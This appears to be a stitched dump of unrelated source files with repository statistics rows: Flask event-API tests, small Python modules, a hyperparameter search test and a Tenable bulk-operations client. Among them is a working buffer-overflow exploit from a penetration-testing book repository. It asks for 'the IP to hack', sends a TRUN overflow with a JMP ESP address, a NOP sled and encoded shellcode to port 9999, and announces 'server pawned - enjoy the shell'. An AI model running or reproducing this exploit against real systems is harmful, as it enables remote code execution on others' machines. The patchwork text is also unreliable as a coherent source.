event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_a_id = seeder.upsert_event_organizer(other_admin_unit_id, "Organizer A")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_invalidDateFormat(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="07.02.2021T11:00:00.000Z")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-07T10:59:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_durationMoreThanMaxAllowedDuration(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-21T11:01:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_categories(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
category_id = seeder.get_event_category_id("Art")
put = create_put(place_id, organizer_id)
put["categories"] = [{"id": category_id}]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.category.name == "Art"
def test_put_dateWithTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00+01:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
def test_put_dateWithoutTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
def test_put_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("other@test.de")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Changed name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "other@test.de")
def test_put_referencedEventNonDirtyUpdate_doesNotSendMail(
client, seeder, utils, app, mocker
):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("other@test.de")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
mail_mock.assert_not_called()
def test_patch(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"description": "Neu"})
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.name == "Name"
assert event.description == "Neu"
def test_patch_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{
"date_definitions": [
{"start": "2021-02-07T11:00:00.000Z", "end": "2021-02-07T10:59:00.000Z"}
]
},
)
utils.assert_response_bad_request(response)
def test_patch_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
other_user_id = seeder.create_user("other@test.de")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"name": "Changed name"})
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "other@test.de")
def test_patch_photo(client, seeder, utils, app, requests_mock):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
requests_mock.get(
"https://image.com", content=base64.b64decode(seeder.get_default_image_base64())
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"image_url": "https://image.com"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo is not None
assert event.photo.encoding_format == "image/png"
def test_patch_photo_copyright(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"copyright_text": "Heiner"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo.id == image_id
assert event.photo.data is not None
assert event.photo.copyright_text == "Heiner"
def test_patch_photo_delete(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": None},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event, Image
event = Event.query.get(event_id)
assert event.photo_id is None
image = Image.query.get(image_id)
assert image is None
def test_delete(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.delete(url)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event is None
def test_report_mail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_base(admin=False, log_in=False)
event_id = seeder.create_event(admin_unit_id)
seeder.create_user(email="admin@test.de", admin=True)
seeder.create_user(email="normal@test.de", admin=False)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event_reports", id=event_id)
response = utils.post_json(
url,
{
"contact_name": "Firstname Lastname",
"contact_email": "firstname.lastname@test.de",
"message": "Diese Veranstaltung wird nicht stattfinden.",
},
)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(
mail_mock,
["test@test.de", "admin@test.de"],
[
"Firstname Lastname",
"firstname.lastname@test.de",
"Diese Veranstaltung wird nicht stattfinden.",
],
)
| 35.896254
| 88
| 0.717726
| 3,525
| 24,912
| 4.70922
| 0.068085
| 0.070482
| 0.080181
| 0.04506
| 0.801807
| 0.783735
| 0.771386
| 0.754578
| 0.741807
| 0.726566
| 0
| 0.015753
| 0.174374
| 24,912
| 693
| 89
| 35.948052
| 0.791229
| 0
| 0
| 0.591522
| 0
| 0
| 0.101879
| 0.018184
| 0
| 0
| 0
| 0
| 0.177264
| 1
| 0.071291
| false
| 0
| 0.034682
| 0
| 0.1079
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f1ddd151ff87dcd7e51c55f008a1130b75ec8a7
| 85
|
py
|
Python
|
dictionaryutils/version_data.py
|
chicagopcdc/dictionaryutils
|
079b530c063690f350147727b1e419b6cec63716
|
[
"Apache-2.0"
] | null | null | null |
dictionaryutils/version_data.py
|
chicagopcdc/dictionaryutils
|
079b530c063690f350147727b1e419b6cec63716
|
[
"Apache-2.0"
] | null | null | null |
dictionaryutils/version_data.py
|
chicagopcdc/dictionaryutils
|
079b530c063690f350147727b1e419b6cec63716
|
[
"Apache-2.0"
] | null | null | null |
DICTCOMMIT="d127bb07681750556db90083bc63de1df9f81d71"
DICTVERSION="2.0.1-6-gd127bb0"
| 28.333333
| 53
| 0.858824
| 8
| 85
| 9.125
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.421687
| 0.023529
| 85
| 2
| 54
| 42.5
| 0.457831
| 0
| 0
| 0
| 0
| 0
| 0.658824
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f358703133befbd4eca015f172e7d4aa9f692b0
| 42
|
py
|
Python
|
nox/src/nox/coreapps/pyrt/__init__.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 28
|
2015-02-04T13:59:25.000Z
|
2021-12-29T03:44:47.000Z
|
nox/src/nox/coreapps/pyrt/__init__.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 552
|
2015-01-05T18:25:54.000Z
|
2022-03-16T18:51:13.000Z
|
nox/src/nox/coreapps/pyrt/__init__.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 25
|
2015-02-04T18:48:20.000Z
|
2020-06-18T15:51:05.000Z
|
from nox.coreapps.pyrt.bootstrap import *
| 21
| 41
| 0.809524
| 6
| 42
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2f48d54d80c1e54c31e5f593dededd3fe38824ce
| 2,432
|
py
|
Python
|
Chapter10/BufferOverflow.py
|
PacktPublishing/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition
|
4de4146e2f0138f13fd197846bfdc0674db6d59c
|
[
"MIT"
] | 54
|
2018-12-27T22:17:36.000Z
|
2022-03-01T20:12:10.000Z
|
Chapter11/Chapter-11_BufferOverFlow.py
|
urantialife/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Second-Edition
|
33b8fbd5472942fec29f8211d0bba6ffe71218bd
|
[
"MIT"
] | null | null | null |
Chapter11/Chapter-11_BufferOverFlow.py
|
urantialife/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Second-Edition
|
33b8fbd5472942fec29f8211d0bba6ffe71218bd
|
[
"MIT"
] | 26
|
2019-02-22T03:21:21.000Z
|
2021-12-23T16:03:52.000Z
|
import socket
IP = raw_input("enter the IP to hack")
PORT = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
banner = s.recv(1024)
print(banner)
command = "TRUN "
header = "|/.:/"
buffer = "Z" * 2002
#625011AF FFE4 JMP ESP
eip = "\xAF\x11\x50\x62"
nops = "\x90" * 50
buf = ""
buf += "\xd9\xc0\xd9\x74\x24\xf4\x5d\xb8\x8b\x16\x93\x5e\x2b"
buf += "\xc9\xb1\x61\x83\xed\xfc\x31\x45\x16\x03\x45\x16\xe2"
buf += "\x7e\xcf\x53\x87\xf4\xd4\xa7\x62\x4b\xfe\x93\x1a\xda"
buf += "\xd4\xea\xac\x47\x1a\x97\xd9\xf4\xb6\x9b\xe5\x6a\x8e"
buf += "\x0f\x76\x34\x24\x05\x1c\xb1\x08\xbe\xdd\x30\x77\x68"
buf += "\xbe\xf8\x2e\x89\xc9\x61\x6c\x50\xf8\xa9\xef\x7d\xbd"
buf += "\xd2\x51\x11\x59\x4e\x47\x07\xf9\x83\x38\x22\x94\xe6"
buf += "\x4d\xb5\x87\xc7\x54\xb6\x85\xa6\x5d\x3c\x0e\xe0\x1d"
buf += "\x28\xbb\xac\x65\x5b\xd5\x83\xab\x6b\xf3\xe7\x4a\xc4"
buf += "\x65\xdf\x76\x52\xf2\x18\xe7\xf1\xf3\xb5\x6b\x02\xfe"
buf += "\x43\xff\xc7\x4b\x76\x68\x3e\x5d\xc4\x17\x91\x66\x08"
buf += "\x21\xd8\x52\x77\x99\x59\xa9\x74\xba\xea\xfd\x0f\xfb"
buf += "\x11\xf3\x29\x70\x2d\x3f\x0d\xbb\x5c\xe9\x13\x5f\x64"
buf += "\x35\x20\xd1\x6b\xc4\x41\xde\x53\xeb\x34\xec\xf8\x07"
buf += "\xac\xe1\x43\xbc\x47\x1f\x6a\x46\x57\x33\x04\xb0\xda"
buf += "\xe3\x5d\xf0\x67\x90\x40\x14\x9b\x73\x98\x50\xa4\x19"
buf += "\x80\xe0\x4b\xb4\xbc\xdd\xac\xaa\x92\x2b\x07\xa6\x3d"
buf += "\xd2\x0c\xdd\xf9\x99\xb9\xdb\x93\x93\x1e\x20\x89\x57"
buf += "\x7c\x1e\xfe\x45\x50\x2a\x1a\x79\x8c\xbf\xdb\x76\xb5"
buf += "\xf5\x98\x6c\x06\xed\xa8\xdb\x9f\x67\x67\x56\x25\xe7"
buf += "\xcd\xa2\xa1\x0f\xb6\xc9\x3f\x4b\x67\x98\x1f\xe3\xdc"
buf += "\x6f\xc5\xe2\x21\x3d\xcd\x23\xcb\x5f\xe9\x30\xf7\xf1"
buf += "\x2d\x36\x0c\x19\x58\x6e\xa3\xff\x4e\x2b\x52\xea\xe7"
buf += "\x42\xcb\x21\x3d\xe0\x78\x07\xca\x92\xe0\xbb\x84\xa1"
buf += "\x61\xf4\xfb\xbc\xdc\xc8\x56\x63\x12\xf8\xb5\x1b\xdc"
buf += "\x1e\xda\xfb\x12\xbe\xc1\x56\x5b\xf9\xfc\xfb\x1a\xc0"
buf += "\x73\x65\x54\x6e\xd1\x13\x06\xd9\xcc\xfb\x53\x99\x79"
buf += "\xda\x05\x34\xd2\x50\x5a\xd0\x78\x4a\x0d\x6e\x5b\x66"
buf += "\xbb\x07\x95\x0b\x03\x32\x4c\x23\x57\xce\xb1\x1f\x2a"
buf += "\xe1\xe3\xc7\x08\x0c\x5c\xfa\x02\x63\x37\xb9\x5a\xd1"
buf += "\xfe\xa9\x05\xe3\xfe\x88\xcf\x3d\xda\xf6\xf0\x90\x6b"
buf += "\x3c\x8b\x39\x3e\xb3\x66\x79\xb3\xd5\x8e\x71"
s.send (command + header + buffer + eip + nops + buf)
print ("server pawned - enjoy the shell")
| 48.64
| 62
| 0.659951
| 510
| 2,432
| 3.141176
| 0.480392
| 0.014981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.240072
| 0.088816
| 2,432
| 49
| 63
| 49.632653
| 0.482852
| 0.009457
| 0
| 0
| 0
| 0.680851
| 0.722061
| 0.687993
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.021277
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f927572baae873855fb40486cc1b8e9387f1ef2
| 3,853
|
py
|
Python
|
tigerforecast/utils/autotuning/tests/test_grid_search.py
|
danielsuo/TigerForecast
|
ae18b169d96dd81db88ab27a8b055036845d3a8f
|
[
"Apache-2.0"
] | 1
|
2020-07-28T09:07:29.000Z
|
2020-07-28T09:07:29.000Z
|
tigerforecast/utils/autotuning/tests/test_grid_search.py
|
danielsuo/TigerForecast
|
ae18b169d96dd81db88ab27a8b055036845d3a8f
|
[
"Apache-2.0"
] | null | null | null |
tigerforecast/utils/autotuning/tests/test_grid_search.py
|
danielsuo/TigerForecast
|
ae18b169d96dd81db88ab27a8b055036845d3a8f
|
[
"Apache-2.0"
] | 1
|
2021-04-12T22:39:26.000Z
|
2021-04-12T22:39:26.000Z
|
"""
unit tests for GridSearch class
"""
import tigerforecast
from tigerforecast.utils.autotuning import GridSearch
from tigerforecast.utils.optimizers import *
import jax.numpy as np
import matplotlib.pyplot as plt
import itertools
def test_grid_search(show=False):
test_grid_search_arma(show=show)
test_grid_search_lstm(show=show)
print("test_grid_search passed")
def test_grid_search_lstm(show=False):
problem_id = "SP500-v0"
method_id = "LSTM"
problem_params = {} # {'p':4, 'q':1} # params for ARMA problem
method_params = {'n':1, 'm':1}
loss = lambda a, b: np.sum((a-b)**2)
search_space = {'l': [3, 4, 5, 6], 'h': [2, 5, 8], 'optimizer':[]} # parameters for ARMA method
opts = [Adam, Adagrad, ONS, OGD]
lr_start, lr_stop = -1, -3 # search learning rates from 10^start to 10^stop
learning_rates = np.logspace(lr_start, lr_stop, 1+2*np.abs(lr_start - lr_stop))
for opt, lr in itertools.product(opts, learning_rates):
search_space['optimizer'].append(opt(learning_rate=lr)) # create instance and append
trials, min_steps = 10, 100
hpo = GridSearch() # hyperparameter optimizer
optimal_params, optimal_loss = hpo.search(method_id, method_params, problem_id, problem_params, loss,
search_space, trials=trials, smoothing=10, min_steps=min_steps, verbose=show) # run each model at least 1000 steps
if show:
print("optimal params: ", optimal_params)
print("optimal loss: ", optimal_loss)
# test resulting method params
method = tigerforecast.method(method_id)
method.initialize(**optimal_params)
problem = tigerforecast.problem(problem_id)
x = problem.initialize(**problem_params)
loss = []
if show:
print("run final test with optimal parameters")
for t in range(5000):
y_pred = method.predict(x)
y_true = problem.step()
loss.append(mse(y_pred, y_true))
method.update(y_true)
x = y_true
if show:
print("plot results")
plt.plot(loss)
plt.show(block=False)
plt.pause(10)
plt.close()
def test_grid_search_arma(show=False):
problem_id = "ARMA-v0"
method_id = "AutoRegressor"
problem_params = {'p':3, 'q':2}
method_params = {}
loss = lambda a, b: np.sum((a-b)**2)
search_space = {'p': [1,2,3,4,5], 'optimizer':[]} # parameters for ARMA method
opts = [Adam, Adagrad, ONS, OGD]
lr_start, lr_stop = 0, -4 # search learning rates from 10^start to 10^stop
learning_rates = np.logspace(lr_start, lr_stop, 1+2*np.abs(lr_start - lr_stop))
for opt, lr in itertools.product(opts, learning_rates):
search_space['optimizer'].append(opt(learning_rate=lr)) # create instance and append
trials, min_steps = 25, 250
hpo = GridSearch() # hyperparameter optimizer
optimal_params, optimal_loss = hpo.search(method_id, method_params, problem_id, problem_params, loss,
search_space, trials=trials, smoothing=10, min_steps=min_steps, verbose=show) # run each model at least 1000 steps
if show:
print("optimal params: ", optimal_params)
print("optimal loss: ", optimal_loss)
# test resulting method params
method = tigerforecast.method(method_id)
method.initialize(**optimal_params)
problem = tigerforecast.problem(problem_id)
x = problem.initialize(**problem_params)
loss = []
if show:
print("run final test with optimal parameters")
for t in range(5000):
y_pred = method.predict(x)
y_true = problem.step()
loss.append(mse(y_pred, y_true))
method.update(y_true)
x = y_true
if show:
print("plot results")
plt.plot(loss)
plt.show(block=False)
plt.pause(10)
plt.close()
if __name__ == "__main__":
test_grid_search(show=True)
| 34.711712
| 122
| 0.663898
| 540
| 3,853
| 4.551852
| 0.222222
| 0.042311
| 0.03987
| 0.031733
| 0.807567
| 0.771359
| 0.771359
| 0.771359
| 0.771359
| 0.771359
| 0
| 0.024867
| 0.217233
| 3,853
| 110
| 123
| 35.027273
| 0.790119
| 0.11783
| 0
| 0.681818
| 0
| 0
| 0.078768
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034091
| false
| 0.011364
| 0.068182
| 0
| 0.102273
| 0.102273
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
85cc887b024bba07d53717da85a82598874fc86f
| 5,253
|
py
|
Python
|
tenable_io/api/bulk_operations.py
|
skrtu/Tenable.io-SDK-for-Python
|
fde8871ba558666609183ac8702149ecf08421b5
|
[
"MIT"
] | 90
|
2017-02-02T18:36:17.000Z
|
2022-02-05T17:58:50.000Z
|
tenable_io/api/bulk_operations.py
|
skrtu/Tenable.io-SDK-for-Python
|
fde8871ba558666609183ac8702149ecf08421b5
|
[
"MIT"
] | 64
|
2017-02-03T00:54:00.000Z
|
2020-08-06T14:06:50.000Z
|
tenable_io/api/bulk_operations.py
|
skrtu/Tenable.io-SDK-for-Python
|
fde8871ba558666609183ac8702149ecf08421b5
|
[
"MIT"
] | 49
|
2017-02-03T01:01:00.000Z
|
2022-02-25T13:25:28.000Z
|
from tenable_io.api.base import BaseApi, BaseRequest
from tenable_io.api.models import BulkOpTask
class BulkOperationsApi(BaseApi):
def bulk_add_agent(self, group_id, bulk_add_agent, scanner_id=1):
"""Creates a bulk operation task to add agents to a group.
:param group_id: The agent group ID.
:param bulk_add_agent: An instance of :class:`BulkAddAgentRequest`.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.post('scanners/%(scanner_id)s/agent-groups/%(group_id)s/agents/_bulk/add',
bulk_add_agent,
path_params={
'scanner_id': scanner_id,
'group_id': group_id
})
return BulkOpTask.from_json(response.text)
def bulk_remove_agent(self, group_id, bulk_remove_agent, scanner_id=1):
"""Create a bulk operation task to remove agents from a group.
:param group_id: The agent group ID.
:param bulk_remove_agent: An instance of :class:`BulkRemoveAgentRequest`.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.post('scanners/%(scanner_id)s/agent-groups/%(group_id)s/agents/_bulk/remove',
bulk_remove_agent,
path_params={
'scanner_id': scanner_id,
'group_id': group_id
})
return BulkOpTask.from_json(response.text)
def bulk_unlink_agent(self, bulk_unlink_agent, scanner_id=1):
"""Creates a bulk operation task to unlink (delete) agents.
:param bulk_unlink_agent: An instance of :class:`BulkUnlinkAgentRequest`.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.post('scanners/%(scanner_id)s/agents/_bulk/unlink',
bulk_unlink_agent,
path_params={
'scanner_id': scanner_id,
})
return BulkOpTask.from_json(response.text)
def bulk_agent_group_status(self, group_id, task_uuid, scanner_id=1):
"""Check the status of a bulk operation on an agent group.
:param group_id: The agent group ID.
:param task_uuid: The uuid of the task.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.get('scanners/%(scanner_id)s/agent-groups/%(group_id)s/agents/_bulk/%(task_uuid)s',
path_params={
'scanner_id': scanner_id,
'group_id': group_id,
'task_uuid': task_uuid
})
return BulkOpTask.from_json(response.text)
def bulk_agent_status(self, task_uuid, scanner_id=1):
"""Check the status of a bulk operation on an agent.
:param task_uuid: The uuid of the task.
:param scanner_id: The scanner ID.
:raise TenableIOApiException: When API error is encountered.
:return: An instance of :class:`tenable_io.api.models.BulkOpTask`.
"""
response = self._client.get('scanners/%(scanner_id)s/agents/_bulk/%(task_uuid)s',
path_params={
'scanner_id': scanner_id,
'task_uuid': task_uuid
})
return BulkOpTask.from_json(response.text)
class BulkOpAddAgentRequest(BaseRequest):
def __init__(
self,
items=None
):
"""Request for BulkOperationsApi.bulk_add_agent.
:param items: list of agent ids or uuids to add to the group.
:type items: list[int].
"""
self.items = items
class BulkOpRemoveAgentRequest(BaseRequest):
def __init__(
self,
items=None
):
"""Request for BulkOperationsApi.bulk_remove_agent.
:param items: list of agent ids or uuids to add to the group.
:type items: list[int].
"""
self.items = items
class BulkOpUnlinkAgentRequest(BaseRequest):
def __init__(
self,
items=None
):
"""Request for BulkOperationsApi.bulk_unlink_agent.
:param items: list of agent ids or uuids to add to the group.
:type items: list[int].
"""
self.items = items
| 40.72093
| 115
| 0.561203
| 574
| 5,253
| 4.919861
| 0.130662
| 0.095609
| 0.033994
| 0.048159
| 0.831091
| 0.786473
| 0.782932
| 0.771955
| 0.771955
| 0.738669
| 0
| 0.001474
| 0.354083
| 5,253
| 128
| 116
| 41.039063
| 0.830828
| 0.363602
| 0
| 0.661017
| 0
| 0.016949
| 0.132088
| 0.101401
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135593
| false
| 0
| 0.033898
| 0
| 0.322034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
85e33b3ea6340563cc28d92497ae74c26153eb71
| 281
|
py
|
Python
|
swagger_server/models/__init__.py
|
DITAS-Project/data-analytics
|
e337aa707129b02750162f0cd60b5199a07ade22
|
[
"Apache-2.0"
] | null | null | null |
swagger_server/models/__init__.py
|
DITAS-Project/data-analytics
|
e337aa707129b02750162f0cd60b5199a07ade22
|
[
"Apache-2.0"
] | 7
|
2019-03-04T17:48:48.000Z
|
2019-11-04T14:11:30.000Z
|
swagger_server/models/__init__.py
|
DITAS-Project/data-analytics
|
e337aa707129b02750162f0cd60b5199a07ade22
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models into model package
from swagger_server.models.metric_res import MetricRes
from swagger_server.models.metric_res_inner import MetricResInner
from swagger_server.models.resources import Resources
| 31.222222
| 65
| 0.854093
| 39
| 281
| 5.871795
| 0.538462
| 0.144105
| 0.222707
| 0.30131
| 0.279476
| 0.279476
| 0
| 0
| 0
| 0
| 0
| 0.007937
| 0.103203
| 281
| 8
| 66
| 35.125
| 0.900794
| 0.209964
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
85e70cf2d470176e474feaf640f7bbe9577867bb
| 3,560
|
py
|
Python
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
zaltoprofen/chainer
|
3b03f9afc80fd67f65d5e0395ef199e9506b6ee1
|
[
"MIT"
] | 3,705
|
